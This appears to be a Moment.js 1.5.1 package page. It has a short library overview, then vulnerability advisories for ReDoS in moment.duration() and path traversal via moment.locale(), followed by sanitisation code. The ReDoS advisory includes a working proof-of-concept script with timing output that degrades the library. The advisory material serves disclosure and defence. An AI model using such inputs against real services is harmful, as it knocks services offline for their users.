Moment.js version 1.5.1 is a small but meaningful step on from its predecessor, version 1.5.0. Both versions are JavaScript date libraries that simplify date creation, manipulation, and formatting without modifying the native Date object. The core functionality is the same in both, giving developers a clean and efficient way to manage dates in their projects.
The primary difference lies in the release date and in the bug fixes or minor enhancements included in the newer 1.5.1 version. Released on April 6, 2012, version 1.5.1 arrived shortly after 1.5.0 (March 19, 2012), suggesting a quick response to community feedback or the resolution of issues found after release. Developers choosing between the two should typically favor the later one (1.5.1), since it is more likely to incorporate the stability improvements and bug fixes discovered since the previous stable release.
For developers new to Moment.js, both versions offer a solid foundation. The library's strength lies in an API that provides a chainable approach to modifying, validating, and parsing dates. Moment allows dates to be parsed, validated, and formatted in a human-readable form, which is useful for building flexible, performant applications. As indicated by the included development dependencies, both versions were tested using jshint, nodeunit, and uglify-js, tools that enforce code quality and minification for production environments, giving developers confidence in the library's reliability.
All vulnerabilities affecting version 1.5.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Build a string of `len` + 1 copies of `chr`.
// Note: `i` is never declared with `var`, so this loop and the outer loop
// below share one global `i`; that is why the COUNT values in the output
// advance by 10001 rather than 10000. Behaviour kept as in the advisory.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Feed progressively longer strings of digits to moment.duration() and
// time each call; the time grows super-linearly with the input length.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start); // [seconds, nanoseconds]
  console.log(end);
}
```
```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string (e.g. fr) is used directly to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
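An added example (not code from moment.js or from either advisory) of the sanitization this advisory calls for, extended to cover the duration input from the ReDoS advisory above: both helpers fail closed before moment.locale() or moment.duration() ever sees the value. The allowlist contents and the 64-character limit are assumptions for the example.

```javascript
// Added example, not code from moment.js or from the advisories above.
// Both helpers run BEFORE moment.locale()/moment.duration() see the value;
// moment itself is not required here, so the block runs stand-alone.

// Assumption: the application ships exactly these locale bundles
// (constructed list). Anything else falls back to the default.
const ALLOWED_LOCALES = new Set(['en', 'fr', 'de', 'pt-br', 'zh-cn']);

// BCP 47-style shape: letters, digits and hyphens only. A '/', '\' or '.'
// can never pass, so a "dir/../../filename" locale fails closed.
const LOCALE_RE = /^[a-z]{2,3}(?:-[a-z0-9]{2,8})*$/;

function safeLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const name = input.trim().toLowerCase();
  if (name.length > 35 || !LOCALE_RE.test(name)) return fallback;
  // The allowlist is the real control; the regex just keeps the set small.
  return ALLOWED_LOCALES.has(name) ? name : fallback;
}

// Assumption: no legitimate duration string needs more than 64 characters.
// The PoC above needs 20000+ characters before the slowdown is measurable.
const MAX_DURATION_LEN = 64;
// ISO 8601 ("P1Y2M3DT4H5M6S") or clock style ("7.23:59:59.999"); every
// quantifier is bounded or a single character class, so this regex is
// itself linear-time and cannot reintroduce the problem it guards against.
const DURATION_RE =
  /^-?(?:P[0-9YMWDTHS.,]{1,60}|[0-9]{1,4}(?:[:.][0-9]{1,3}){0,4})$/;

// Returns the string to hand to moment.duration(), or null to reject it.
function safeDurationString(input) {
  if (typeof input !== 'string') return null;
  const s = input.trim();
  if (s.length === 0 || s.length > MAX_DURATION_LEN) return null;
  return DURATION_RE.test(s) ? s : null;
}
```

Reject early and log the rejection: a rejected locale or an oversized duration string is a useful signal that a request parameter is being probed.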